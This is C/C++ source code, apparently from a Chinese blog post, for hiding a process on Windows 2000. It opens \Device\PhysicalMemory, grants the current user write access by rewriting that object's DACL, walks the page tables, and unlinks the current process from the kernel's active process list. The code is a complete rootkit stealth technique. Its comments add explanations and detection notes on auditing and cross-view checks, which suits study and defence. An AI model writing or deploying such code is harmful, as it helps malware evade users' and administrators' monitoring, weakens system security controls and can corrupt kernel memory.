在Win2K系统中隐藏进程的VC代码
#include
<
windows.h
>
#include
<
Accctrl.h
>
#include
<
Aclapi.h
>
//Powered by barenx
/* NTSTATUS helpers: a status is a success when its sign bit is clear. */
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

/* Native-API structures declared locally (the public SDK headers of the
 * period did not ship them).  IO_STATUS_BLOCK is declared but not referenced
 * anywhere in this file. */
typedef struct _IO_STATUS_BLOCK {
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

/* OBJECT_ATTRIBUTES.Attributes flags.  Only a bare 0 is ever passed below,
 * so none of these are used; they are kept for completeness. */
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

/* Function-pointer types for the two ntdll exports that InitNTDLL() resolves
 * at run time with GetProcAddress.  Because they are not imported statically,
 * a static import-table scan will not list them; the literal export names in
 * InitNTDLL() are the artefact to look for. */
typedef NTSTATUS (CALLBACK *ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
);
typedef VOID (CALLBACK *RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

/* Resolved by InitNTDLL(); left NULL if GetProcAddress fails, and no caller
 * checks them before calling through. */
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;            /* ntdll.dll module handle (InitNTDLL/CloseNTDLL) */
PVOID g_pMapPhysicalMemory = NULL;  /* 4 KiB view mapped by OpenPhysicalMemory, never unmapped */
HANDLE g_hMPM = NULL;               /* handle to the physical-memory section */
/*
 * Load ntdll.dll and resolve the two exports this file calls through
 * function pointers.  Returns FALSE only when LoadLibrary fails; a failed
 * GetProcAddress is not detected and leaves the corresponding global NULL.
 * The module handle is kept in g_hNtDLL for CloseNTDLL().
 */
BOOL InitNTDLL()
{
    HMODULE hNtdll = LoadLibrary("ntdll.dll");
    g_hNtDLL = hNtdll;
    if (hNtdll == NULL) {
        return FALSE;
    }
    /* Resolved dynamically, so neither name appears in the import table. */
    FARPROC pfnInitString = GetProcAddress(hNtdll, "RtlInitUnicodeString");
    FARPROC pfnOpenSection = GetProcAddress(hNtdll, "ZwOpenSection");
    RtlInitUnicodeString = (RTLINITUNICODESTRING)pfnInitString;
    ZwOpenSection = (ZWOPENSECTION)pfnOpenSection;
    return TRUE;
}

/*
 * Release the ntdll.dll reference taken by InitNTDLL().  g_hNtDLL is not
 * reset to NULL, so a second call would call FreeLibrary on it again.
 */
VOID CloseNTDLL()
{
    HMODULE hModule = g_hNtDLL;
    if (hModule == NULL) {
        return;
    }
    FreeLibrary(hModule);
}

/*
 * Rewrite the DACL of an already-open section handle so that the calling
 * user is granted SECTION_MAP_WRITE.  OpenPhysicalMemory() calls this after a
 * read/write open of the physical-memory section was refused, using a handle
 * it re-opened with READ_CONTROL|WRITE_DAC.  Failures are silent: nothing is
 * returned, so the caller cannot tell whether the DACL was changed.
 *
 * Detection note: a DACL change on this particular kernel object is the
 * most distinctive step of the whole routine; with object-access auditing
 * configured for it, the WRITE_DAC open and the SetSecurityInfo call are
 * both visible.
 */
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl = NULL;
    PACL pNewDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    DWORD dwRes;
    EXPLICIT_ACCESS ea;
    /* Fetch the current DACL.  pDacl points into pSD and is released with it.
     * Precedence: `!=` binds tighter than `=`, so dwRes receives the result of
     * the comparison rather than the error code; dwRes is never read, so this
     * only matters when debugging. */
    if (dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                                NULL, NULL, &pDacl, NULL, &pSD) != ERROR_SUCCESS) {
        goto CleanUp;
    }
    /* One allow-ACE for the special "CURRENT_USER" trustee name, merged with
     * the existing DACL by SetEntriesInAcl into a fresh pNewDacl. */
    ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance = NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = "CURRENT_USER";

    /* Same precedence issue as above. */
    if (dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl) != ERROR_SUCCESS) {
        goto CleanUp;
    }
    /* Apply the new DACL; requires the handle to have been opened with WRITE_DAC. */
    if (dwRes = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL) != ERROR_SUCCESS) {
        goto CleanUp;
    }
CleanUp:
    if (pSD)
        LocalFree(pSD);
    if (pNewDacl)
        LocalFree(pNewDacl);
}

/*
 * Open the physical-memory section for read/write and map the 4 KiB page at
 * physical offset 0x30000 into g_pMapPhysicalMemory; LinearToPhys() later
 * indexes that view as a page directory.  Returns the section handle (also
 * stored in g_hMPM) or NULL.
 *
 * Relies on the run-time-resolved RtlInitUnicodeString/ZwOpenSection set by
 * InitNTDLL(); neither pointer is checked for NULL here.
 */
HANDLE OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    /* NOTE(review): the object path literal is shown with forward slashes on
     * this page; confirm it matches the original source before reasoning
     * about which object it names. */
    RtlInitUnicodeString(&physmemString, L"/Device/PhysicalMemory");
    attributes.Length = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory = NULL;
    attributes.ObjectName = &physmemString;
    attributes.Attributes = 0;   /* none of the OBJ_* flags defined above */
    attributes.SecurityDescriptor = NULL;
    attributes.SecurityQualityOfService = NULL;
    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);

    /* Access denied: re-open for READ_CONTROL|WRITE_DAC only, grant the current
     * user write access on the object's DACL, close, and open again.  The
     * status of the intermediate open is overwritten without being checked,
     * and SetPhyscialMemorySectionCanBeWrited reports nothing. */
    if (status == STATUS_ACCESS_DENIED) {
        status = ZwOpenSection(&g_hMPM, READ_CONTROL | WRITE_DAC, &attributes);
        SetPhyscialMemorySectionCanBeWrited(g_hMPM);
        CloseHandle(g_hMPM);
        /* Both OR'ed operands are SECTION_MAP_WRITE, so this retry requests
         * write access only — unlike the first attempt above. */
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_WRITE | SECTION_MAP_WRITE, &attributes);
    }
    if (!NT_SUCCESS(status)) {
        return NULL;
    }
    /* 4 == FILE_MAP_READ.  0x30000 is the physical offset of the page the rest
     * of the file treats as the page-directory base — presumably the kernel's
     * directory on the targeted Win2K build; TODO confirm. */
    g_pMapPhysicalMemory = MapViewOfFile(
        g_hMPM,
        4,
        0,
        0x30000,
        0x1000);
    if (g_pMapPhysicalMemory == NULL) {
        return NULL;   /* g_hMPM is left open on this path */
    }
    return g_hMPM;
}

/*
 * Translate a virtual address to a physical one by walking a two-level
 * 32-bit x86 page table through the physical-memory section.
 *   BaseAddress - mapped view of the page directory (g_pMapPhysicalMemory)
 *   addr        - virtual address to translate
 * Returns the physical address, or 0 when the directory or table entry has
 * the present bit (bit 0) clear.  Every pointer is squeezed through ULONG,
 * so this is 32-bit only.  The MapViewOfFile result is dereferenced without
 * a NULL check, and on the "PTE not present" path the mapped view is never
 * unmapped.
 */
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr, PGDE, PTE, PAddr;
    PGDE = BaseAddress[VAddr >> 22];              /* top 10 bits index the directory */
    if ((PGDE & 1) != 0) {                        /* directory entry present */
        ULONG tmp = PGDE & 0x00000080;            /* bit 7 set: 4 MiB page, no second level */
        if (tmp != 0) {
            PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
        }
        else {
            /* Map the page-table page named by the directory entry and read
             * the entry selected by the middle 10 bits of the address. */
            PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
            PTE = ((PULONG)PGDE)[(VAddr & 0x003FF000) >> 12];
            if ((PTE & 1) != 0) {                 /* table entry present */
                PAddr = (PTE & 0xFFFFF000) + (VAddr & 0x00000FFF);
                UnmapViewOfFile((PVOID)PGDE);
            }
            else return 0;                        /* view mapped above is leaked here */
        }
    }
    else return 0;
    return (PVOID)PAddr;
}

/*
 * Read one 32-bit value at virtual address addr: translate it through the
 * page tables, map the containing physical page read-only (4 == FILE_MAP_READ)
 * from the physical-memory section, and pick out the dword.  Returns 0 when
 * MapViewOfFile fails.  A translation result of 0 ("not present") is not
 * distinguished from physical address 0, so the read then targets page 0.
 */
ULONG GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    ULONG pageBase = phys & 0xfffff000;
    ULONG wordIndex = (phys & 0xFFF) >> 2;
    PULONG view = (PULONG)MapViewOfFile(g_hMPM, 4, 0, pageBase, 0x1000);
    if (view == NULL) {
        return 0;
    }
    ULONG value = view[wordIndex];
    UnmapViewOfFile(view);
    return value;
}

/*
 * Write one 32-bit value at virtual address addr: translate it through the
 * page tables, map the containing physical page writable from the
 * physical-memory section, and store the dword.  Returns FALSE only when
 * MapViewOfFile fails.  As with GetData, a translation result of 0 is not
 * rejected and the write then targets physical page 0.
 */
BOOL SetData(PVOID addr, ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    ULONG pageBase = phys & 0xfffff000;
    ULONG wordIndex = (phys & 0xFFF) >> 2;
    PULONG view = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, pageBase, 0x1000);
    if (view == NULL) {
        return FALSE;
    }
    view[wordIndex] = data;
    UnmapViewOfFile(view);
    return TRUE;
}

/*
 * Entry point.  Opens physical memory, then unlinks one entry from a doubly
 * linked list by writing through physical memory: fw/bw are the forward and
 * backward links read at +0xa0/+0xa4 of the block the code calls "process";
 * (fw+4) <- bw rewrites the successor's back link and (bw) <- fw rewrites
 * the predecessor's forward link.  The chain 0xFFDFF124 -> thread ->
 * +0x22c -> process is followed through hard-coded Win2K layout constants;
 * on any other build these reads and writes land on unrelated physical
 * memory, with no validation of what was read.
 *
 * Returns FALSE only when OpenPhysicalMemory() fails.  When InitNTDLL()
 * fails nothing is done and TRUE is still returned.  g_hMPM is closed but
 * the g_pMapPhysicalMemory view is never unmapped.
 *
 * Detection note: this is direct manipulation of a kernel list (DKOM).  The
 * standard counter is a cross-view check — compare the list that enumeration
 * walks against an independent way of finding the same objects and report
 * any entry present in one and not the other.
 */
BOOL HideProcessAtAll()
{
    if (InitNTDLL()) {
        if (OpenPhysicalMemory() == 0) {
            return FALSE;
        }
        ULONG thread = GetData((PVOID)0xFFDFF124);
        ULONG process = GetData(PVOID(thread + 0x22c));
        ULONG fw = GetData(PVOID(process + 0xa0)), bw = GetData(PVOID(process + 0xa4));
        /* Unlink: successor's back link, then predecessor's forward link. */
        SetData(PVOID(fw + 4), bw);
        SetData(PVOID(bw), fw);
        CloseHandle(g_hMPM);
        CloseNTDLL();
    }
    return TRUE;
}
本文介绍了一种在Windows 2000系统中隐藏进程的技术实现,通过使用VC++编程,利用内核级API调用修改内存映射权限,进而达到隐藏指定进程的目的。




